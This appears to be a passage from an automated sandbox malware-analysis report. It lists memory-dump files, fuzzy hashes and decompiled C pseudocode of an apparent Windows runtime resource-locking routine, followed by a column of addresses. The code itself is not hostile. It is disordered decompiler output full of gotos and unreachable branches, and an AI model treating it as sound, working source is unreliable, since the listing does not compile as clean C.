                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                              • Instruction ID: 688084f030b8fd5028a8d110dc5ec42e1accb143fba33af9b211687bf4da103e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBA1AC71D0431ADFCF24EF68C8446AEB7B5FF05319F28856AE852E7242D6309A41CF91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                              			E00890554(signed int _a4, char _a8) {
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int* _t49;
                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                              				signed int _t56;
                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                              				signed int _t63;
                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                              				signed int _t107;
                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                                              				signed int* _t119;
                                                                                                                                                                                                              				void* _t125;
                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                              				signed int _t128;
                                                                                                                                                                                                              				signed int _t130;
                                                                                                                                                                                                              				signed int _t138;
                                                                                                                                                                                                              				signed int _t144;
                                                                                                                                                                                                              				void* _t158;
                                                                                                                                                                                                              				void* _t159;
                                                                                                                                                                                                              				void* _t160;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t96 = _a4;
                                                                                                                                                                                                              				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                              				_push(_t138);
                                                                                                                                                                                                              				if(_t115 < 0) {
                                                                                                                                                                                                              					_t105 =  *[fs:0x18];
                                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                                                              						asm("lock xadd [eax], edx");
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                              					_push(_t128);
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                              						if(_t115 >= 0) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _a8;
                                                                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              							_t49 = _t96 + 0x1c;
                                                                                                                                                                                                              							_t106 = 1;
                                                                                                                                                                                                              							asm("lock xadd [edx], ecx");
                                                                                                                                                                                                              							_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                              							__eflags = _t115;
                                                                                                                                                                                                              							if(_t115 < 0) {
                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                              								_t130 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                              									asm("sbb esi, esi");
                                                                                                                                                                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
                                                                                                                                                                                                              									_push(_t144);
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_t51 = E0084F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                                                              									__eflags = _t51 - 0x102;
                                                                                                                                                                                                              									if(_t51 != 0x102) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t106 =  *(_t144 + 4);
                                                                                                                                                                                                              									_t126 =  *_t144;
                                                                                                                                                                                                              									_t86 = E00894FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                                                              									_push(_t126);
                                                                                                                                                                                                              									_push(_t86);
                                                                                                                                                                                                              									E008A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                                                              									E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                              									_t130 = _t130 + 1;
                                                                                                                                                                                                              									_t160 = _t158 + 0x28;
                                                                                                                                                                                                              									__eflags = _t130 - 2;
                                                                                                                                                                                                              									if(__eflags > 0) {
                                                                                                                                                                                                              										E008D217A(_t106, __eflags, _t96);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_push(0x65);
                                                                                                                                                                                                              									E008A3F92();
                                                                                                                                                                                                              									_t158 = _t160 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _t51;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t51);
                                                                                                                                                                                                              									E00893915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										L32:
                                                                                                                                                                                                              										__eflags = _a8;
                                                                                                                                                                                                              										if(_a8 == 0) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              										_t119 = _t96 + 0x24;
                                                                                                                                                                                                              										_t107 = 1;
                                                                                                                                                                                                              										asm("lock xadd [eax], ecx");
                                                                                                                                                                                                              										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                              										_a4 = _t56;
                                                                                                                                                                                                              										__eflags = _t56;
                                                                                                                                                                                                              										if(_t56 != 0) {
                                                                                                                                                                                                              											L40:
                                                                                                                                                                                                              											_t128 = 0;
                                                                                                                                                                                                              											__eflags = 0;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                              												asm("sbb esi, esi");
                                                                                                                                                                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
                                                                                                                                                                                                              												_push(_t138);
                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                              												_t58 = E0084F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                                                              												__eflags = _t58 - 0x102;
                                                                                                                                                                                                              												if(_t58 != 0x102) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t107 =  *(_t138 + 4);
                                                                                                                                                                                                              												_t125 =  *_t138;
                                                                                                                                                                                                              												_t75 = E00894FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              												_push(_t125);
                                                                                                                                                                                                              												_push(_t75);
                                                                                                                                                                                                              												E008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                                                              												E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                              												_t128 = _t128 + 1;
                                                                                                                                                                                                              												_t159 = _t158 + 0x28;
                                                                                                                                                                                                              												__eflags = _t128 - 2;
                                                                                                                                                                                                              												if(__eflags > 0) {
                                                                                                                                                                                                              													E008D217A(_t107, __eflags, _t96);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                              												_push(0x65);
                                                                                                                                                                                                              												E008A3F92();
                                                                                                                                                                                                              												_t158 = _t159 + 0xc;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags = _t58;
                                                                                                                                                                                                              											if(__eflags < 0) {
                                                                                                                                                                                                              												_push(_t58);
                                                                                                                                                                                                              												E00893915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                                                              												asm("int3");
                                                                                                                                                                                                              												_t61 =  *_t107;
                                                                                                                                                                                                              												 *_t107 = 0;
                                                                                                                                                                                                              												__eflags = _t61;
                                                                                                                                                                                                              												if(_t61 == 0) {
                                                                                                                                                                                                              													L1:
                                                                                                                                                                                                              													_t63 = E00875384(_t138 + 0x24);
                                                                                                                                                                                                              													if(_t63 != 0) {
                                                                                                                                                                                                              														goto L52;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L2;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                                                              													_push( &_a4);
                                                                                                                                                                                                              													_push(_t61);
                                                                                                                                                                                                              													_t70 = E0084F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                                                              													__eflags = _t70;
                                                                                                                                                                                                              													if(__eflags >= 0) {
                                                                                                                                                                                                              														goto L1;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														_push(_t70);
                                                                                                                                                                                                              														E00893915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                                              														L52:
                                                                                                                                                                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                              														_push( &_a4);
                                                                                                                                                                                                              														_push(1);
                                                                                                                                                                                                              														_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                              														__eflags = _t63;
                                                                                                                                                                                                              														if(__eflags >= 0) {
                                                                                                                                                                                                              															L2:
                                                                                                                                                                                                              															return _t63;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															_push(_t63);
                                                                                                                                                                                                              															E00893915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                              															_push( &_a4);
                                                                                                                                                                                                              															_push(1);
                                                                                                                                                                                                              															_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                              															__eflags = _t63;
                                                                                                                                                                                                              															if(__eflags >= 0) {
                                                                                                                                                                                                              																goto L2;
                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                              																_push(_t63);
                                                                                                                                                                                                              																_t66 = E00893915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                              																asm("int3");
                                                                                                                                                                                                              																while(1) {
                                                                                                                                                                                                              																	_t110 = _t66;
                                                                                                                                                                                                              																	__eflags = _t66 - 1;
                                                                                                                                                                                                              																	if(_t66 != 1) {
                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                              																	}
                                                                                                                                                                                                              																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                                              																	_t66 = _t110;
                                                                                                                                                                                                              																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                              																	__eflags = _t66 - _t110;
                                                                                                                                                                                                              																	if(_t66 != _t110) {
                                                                                                                                                                                                              																		continue;
                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                              																		_t67 =  *[fs:0x18];
                                                                                                                                                                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                                              																		return _t67;
                                                                                                                                                                                                              																	}
                                                                                                                                                                                                              																	goto L59;
                                                                                                                                                                                                              																}
                                                                                                                                                                                                              																E00875329(_t110, _t138);
                                                                                                                                                                                                              																_t69 = E008753A5(_t138, 1);
                                                                                                                                                                                                              																return _t69;
                                                                                                                                                                                                              															}
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                              												goto L3;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_t107 =  *_t119;
                                                                                                                                                                                                              											__eflags = _t107;
                                                                                                                                                                                                              											if(__eflags > 0) {
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													_t81 = _t107;
                                                                                                                                                                                                              													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              													__eflags = _t81 - _t107;
                                                                                                                                                                                                              													if(_t81 == _t107) {
                                                                                                                                                                                                              														break;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t107 = _t81;
                                                                                                                                                                                                              													__eflags = _t81;
                                                                                                                                                                                                              													if(_t81 > 0) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t56 = _a4;
                                                                                                                                                                                                              												__eflags = _t107;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L3:
                                                                                                                                                                                                              													__eflags = _t56;
                                                                                                                                                                                                              													if(_t56 != 0) {
                                                                                                                                                                                                              														goto L32;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                                              													_t56 = 0;
                                                                                                                                                                                                              													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                              													__eflags = 0;
                                                                                                                                                                                                              													if(0 != 0) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                              														return 1;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													goto L59;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L40;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                                              									return 0;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t106 =  *_t49;
                                                                                                                                                                                                              								__eflags = _t106;
                                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										_t93 = _t106;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              										__eflags = _t93 - _t106;
                                                                                                                                                                                                              										if(_t93 == _t106) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t106 = _t93;
                                                                                                                                                                                                              										__eflags = _t93;
                                                                                                                                                                                                              										if(_t93 > 0) {
                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = _t106;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L59;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t84 = _t115;
                                                                                                                                                                                                              					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                                              					__eflags = _t84 - _t115;
                                                                                                                                                                                                              					if(_t84 != _t115) {
                                                                                                                                                                                                              						_t115 = _t84;
                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L59:
                                                                                                                                                                                                              			}




































                                                                                                                                                                                                              0x0089055a
                                                                                                                                                                                                              0x0089055d
                                                                                                                                                                                                              0x00890563
                                                                                                                                                                                                              0x00890566
                                                                                                                                                                                                              0x008905d8
                                                                                                                                                                                                              0x008905e2
                                                                                                                                                                                                              0x008905e5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008905e7
                                                                                                                                                                                                              0x008905e7
                                                                                                                                                                                                              0x008905ea
                                                                                                                                                                                                              0x008905f3
                                                                                                                                                                                                              0x008905f3
                                                                                                                                                                                                              0x00890568
                                                                                                                                                                                                              0x00890568
                                                                                                                                                                                                              0x00890568
                                                                                                                                                                                                              0x00890569
                                                                                                                                                                                                              0x00890569
                                                                                                                                                                                                              0x00890569
                                                                                                                                                                                                              0x0089056b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b217f
                                                                                                                                                                                                              0x008b2183
                                                                                                                                                                                                              0x008b225b
                                                                                                                                                                                                              0x008b225f
                                                                                                                                                                                                              0x008b2189
                                                                                                                                                                                                              0x008b218c
                                                                                                                                                                                                              0x008b218f
                                                                                                                                                                                                              0x008b2194
                                                                                                                                                                                                              0x008b2199
                                                                                                                                                                                                              0x008b219d
                                                                                                                                                                                                              0x008b21a0
                                                                                                                                                                                                              0x008b21a2
                                                                                                                                                                                                              0x008b21ce
                                                                                                                                                                                                              0x008b21ce
                                                                                                                                                                                                              0x008b21ce
                                                                                                                                                                                                              0x008b21d0
                                                                                                                                                                                                              0x008b21d6
                                                                                                                                                                                                              0x008b21de
                                                                                                                                                                                                              0x008b21e2
                                                                                                                                                                                                              0x008b21e8
                                                                                                                                                                                                              0x008b21e9
                                                                                                                                                                                                              0x008b21ec
                                                                                                                                                                                                              0x008b21f1
                                                                                                                                                                                                              0x008b21f6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b21f8
                                                                                                                                                                                                              0x008b21fb
                                                                                                                                                                                                              0x008b2206
                                                                                                                                                                                                              0x008b220b
                                                                                                                                                                                                              0x008b220c
                                                                                                                                                                                                              0x008b2217
                                                                                                                                                                                                              0x008b2226
                                                                                                                                                                                                              0x008b222b
                                                                                                                                                                                                              0x008b222c
                                                                                                                                                                                                              0x008b222f
                                                                                                                                                                                                              0x008b2232
                                                                                                                                                                                                              0x008b2235
                                                                                                                                                                                                              0x008b2235
                                                                                                                                                                                                              0x008b223a
                                                                                                                                                                                                              0x008b223f
                                                                                                                                                                                                              0x008b2241
                                                                                                                                                                                                              0x008b2243
                                                                                                                                                                                                              0x008b2248
                                                                                                                                                                                                              0x008b2248
                                                                                                                                                                                                              0x008b224d
                                                                                                                                                                                                              0x008b224f
                                                                                                                                                                                                              0x008b2262
                                                                                                                                                                                                              0x008b2263
                                                                                                                                                                                                              0x008b2268
                                                                                                                                                                                                              0x008b2269
                                                                                                                                                                                                              0x008b2269
                                                                                                                                                                                                              0x008b2269
                                                                                                                                                                                                              0x008b226d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2276
                                                                                                                                                                                                              0x008b2279
                                                                                                                                                                                                              0x008b227e
                                                                                                                                                                                                              0x008b2283
                                                                                                                                                                                                              0x008b2287
                                                                                                                                                                                                              0x008b228a
                                                                                                                                                                                                              0x008b228d
                                                                                                                                                                                                              0x008b228f
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22be
                                                                                                                                                                                                              0x008b22c4
                                                                                                                                                                                                              0x008b22cc
                                                                                                                                                                                                              0x008b22d0
                                                                                                                                                                                                              0x008b22d6
                                                                                                                                                                                                              0x008b22d7
                                                                                                                                                                                                              0x008b22da
                                                                                                                                                                                                              0x008b22df
                                                                                                                                                                                                              0x008b22e4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22e6
                                                                                                                                                                                                              0x008b22e9
                                                                                                                                                                                                              0x008b22f4
                                                                                                                                                                                                              0x008b22f9
                                                                                                                                                                                                              0x008b22fa
                                                                                                                                                                                                              0x008b2305
                                                                                                                                                                                                              0x008b2314
                                                                                                                                                                                                              0x008b2319
                                                                                                                                                                                                              0x008b231a
                                                                                                                                                                                                              0x008b231d
                                                                                                                                                                                                              0x008b2320
                                                                                                                                                                                                              0x008b2323
                                                                                                                                                                                                              0x008b2323
                                                                                                                                                                                                              0x008b2328
                                                                                                                                                                                                              0x008b232d
                                                                                                                                                                                                              0x008b232f
                                                                                                                                                                                                              0x008b2331
                                                                                                                                                                                                              0x008b2336
                                                                                                                                                                                                              0x008b2336
                                                                                                                                                                                                              0x008b233b
                                                                                                                                                                                                              0x008b233d
                                                                                                                                                                                                              0x008b2350
                                                                                                                                                                                                              0x008b2351
                                                                                                                                                                                                              0x008b2356
                                                                                                                                                                                                              0x008b2359
                                                                                                                                                                                                              0x008b2359
                                                                                                                                                                                                              0x008b235b
                                                                                                                                                                                                              0x008b235d
                                                                                                                                                                                                              0x00875367
                                                                                                                                                                                                              0x0087536b
                                                                                                                                                                                                              0x00875372
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2363
                                                                                                                                                                                                              0x008b2363
                                                                                                                                                                                                              0x008b2369
                                                                                                                                                                                                              0x008b236a
                                                                                                                                                                                                              0x008b236c
                                                                                                                                                                                                              0x008b2371
                                                                                                                                                                                                              0x008b2373
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2379
                                                                                                                                                                                                              0x008b2379
                                                                                                                                                                                                              0x008b237a
                                                                                                                                                                                                              0x008b237f
                                                                                                                                                                                                              0x008b237f
                                                                                                                                                                                                              0x008b2385
                                                                                                                                                                                                              0x008b2386
                                                                                                                                                                                                              0x008b2389
                                                                                                                                                                                                              0x008b238e
                                                                                                                                                                                                              0x008b2390
                                                                                                                                                                                                              0x00875378
                                                                                                                                                                                                              0x0087537c
                                                                                                                                                                                                              0x008b2396
                                                                                                                                                                                                              0x008b2396
                                                                                                                                                                                                              0x008b2397
                                                                                                                                                                                                              0x008b239c
                                                                                                                                                                                                              0x008b23a2
                                                                                                                                                                                                              0x008b23a3
                                                                                                                                                                                                              0x008b23a6
                                                                                                                                                                                                              0x008b23ab
                                                                                                                                                                                                              0x008b23ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b23b3
                                                                                                                                                                                                              0x008b23b3
                                                                                                                                                                                                              0x008b23b4
                                                                                                                                                                                                              0x008b23b9
                                                                                                                                                                                                              0x008b23ba
                                                                                                                                                                                                              0x008b23ba
                                                                                                                                                                                                              0x008b23bc
                                                                                                                                                                                                              0x008b23bf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9153
                                                                                                                                                                                                              0x008a9158
                                                                                                                                                                                                              0x008a915a
                                                                                                                                                                                                              0x008a915e
                                                                                                                                                                                                              0x008a9160
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9166
                                                                                                                                                                                                              0x008a9166
                                                                                                                                                                                                              0x008a9171
                                                                                                                                                                                                              0x008a9176
                                                                                                                                                                                                              0x008a9176
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9160
                                                                                                                                                                                                              0x008b23c6
                                                                                                                                                                                                              0x008b23ce
                                                                                                                                                                                                              0x008b23d7
                                                                                                                                                                                                              0x008b23d7
                                                                                                                                                                                                              0x008b23ad
                                                                                                                                                                                                              0x008b2390
                                                                                                                                                                                                              0x008b2373
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x008b2291
                                                                                                                                                                                                              0x008b2291
                                                                                                                                                                                                              0x008b2293
                                                                                                                                                                                                              0x008b2295
                                                                                                                                                                                                              0x008b229a
                                                                                                                                                                                                              0x008b22a1
                                                                                                                                                                                                              0x008b22a3
                                                                                                                                                                                                              0x008b22a7
                                                                                                                                                                                                              0x008b22a9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22ab
                                                                                                                                                                                                              0x008b22ad
                                                                                                                                                                                                              0x008b22af
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22af
                                                                                                                                                                                                              0x008b22b1
                                                                                                                                                                                                              0x008b22b4
                                                                                                                                                                                                              0x008b22b4
                                                                                                                                                                                                              0x008b22b6
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008753cb
                                                                                                                                                                                                              0x008753ce
                                                                                                                                                                                                              0x008753d0
                                                                                                                                                                                                              0x008753d4
                                                                                                                                                                                                              0x008753d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008753d8
                                                                                                                                                                                                              0x008753e3
                                                                                                                                                                                                              0x008753ea
                                                                                                                                                                                                              0x008753ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008753d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22b6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b228f
                                                                                                                                                                                                              0x008b2349
                                                                                                                                                                                                              0x008b234d
                                                                                                                                                                                                              0x008b2251
                                                                                                                                                                                                              0x008b2251
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2251
                                                                                                                                                                                                              0x008b21a4
                                                                                                                                                                                                              0x008b21a4
                                                                                                                                                                                                              0x008b21a6
                                                                                                                                                                                                              0x008b21a8
                                                                                                                                                                                                              0x008b21ac
                                                                                                                                                                                                              0x008b21b6
                                                                                                                                                                                                              0x008b21b8
                                                                                                                                                                                                              0x008b21bc
                                                                                                                                                                                                              0x008b21be
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b21c0
                                                                                                                                                                                                              0x008b21c2
                                                                                                                                                                                                              0x008b21c4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b21c4
                                                                                                                                                                                                              0x008b21c6
                                                                                                                                                                                                              0x008b21c6
                                                                                                                                                                                                              0x008b21c8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b21c8
                                                                                                                                                                                                              0x008b21a2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2183
                                                                                                                                                                                                              0x0089057b
                                                                                                                                                                                                              0x0089057d
                                                                                                                                                                                                              0x00890581
                                                                                                                                                                                                              0x00890583
                                                                                                                                                                                                              0x008b2178
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890589
                                                                                                                                                                                                              0x0089058f
                                                                                                                                                                                                              0x0089058f
                                                                                                                                                                                                              0x00890583
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
